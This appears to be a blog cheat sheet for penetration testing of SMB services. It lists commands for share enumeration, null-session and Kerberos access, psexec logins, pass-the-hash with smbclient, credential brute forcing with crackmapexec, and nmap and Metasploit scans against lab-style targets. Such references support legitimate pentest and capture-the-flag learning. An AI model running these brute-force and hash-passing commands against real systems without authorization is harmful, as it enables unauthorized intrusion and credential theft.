SMB Pentest Checklist

 

SMB Enumeration 

smbmap -H 10.10.10.10          //Check Privileges 

smbmap -H 10.10.10.10 -R --depth 5

smbclient -L //10.10.10.10/            //List Shares

smbclient //10.10.10.10/Users      //Interactive shell to a share 

smbclient  \\\\10.10.10.10\\share$     //Open a Null Session

smbclient //friendzone.htb/general -U ""    //see files inside

smbclient -N -L //10.10.10.10/      //List Shares as Null User

psexec.py administrator@10.10.10.10         //Enter pass later

smbmap -u Administrator -p 'Password@1' -H 10.10.10.10

smbclient -U 'administrator%Password@1' \\\\10.10.10.10\\c$

Once logged in:

put filename               //can upload any file

#access SMB shares via Windows CMD
net view \\192.168.1.17 /All

#Using Kerberos ticket with Smbclient
smbclient -k -L //10.10.10.10/

#Basic SMB & OS info
crackmapexec smb 10.10.10.10

#List Shares
crackmapexec smb 10.10.10.10 --shares

#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10


#access SMB using a hash
smbclient //10.10.10.10/NAME -U username --pw-nt-hash 07772ae654432cd618915793515asds

#Starting SMB Server
sudo smbserver.py share $(pwd)

#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

#passing blank creds via smb
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success

SMB Enum using Nmap

#SMB Users Enum
nmap -Pn -sV --script smb-enum-users.nse -p445 IP_Address

#SMB OS Discovery
nmap -Pn -sV --script smb-os-discovery IP_Address

#SMB Protocol Discovery
nmap -Pn -sV --script smb-protocols IP_Address 

#SMB Shares Enum
nmap -Pn -sV --script smb-enum-shares -p139,445 IP_Address
nmap -Pn -sV --script smb-enum-shares IP_Address

#SMB Vuln Scan (quote the wildcard so the shell does not expand it)
nmap -Pn -sV --script "smb-vuln*" IP_Address

#SMB Shares Enum using RPCClient
rpcclient -U "" -N IP_Address
netshareenum
netshareenumall

#Enum Using Metasploit
use auxiliary/scanner/smb/smb_enumshares
set rhosts IP_Address
exploit



Also refer to Windows Privilege Escalation Cheatsheet & Linux Privilege Escalation Cheatsheet



Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He enjoys writing articles, blogging, debugging errors and Capture the Flags. Enjoy learning; there is nothing like absolute defeat - try and try until you succeed.
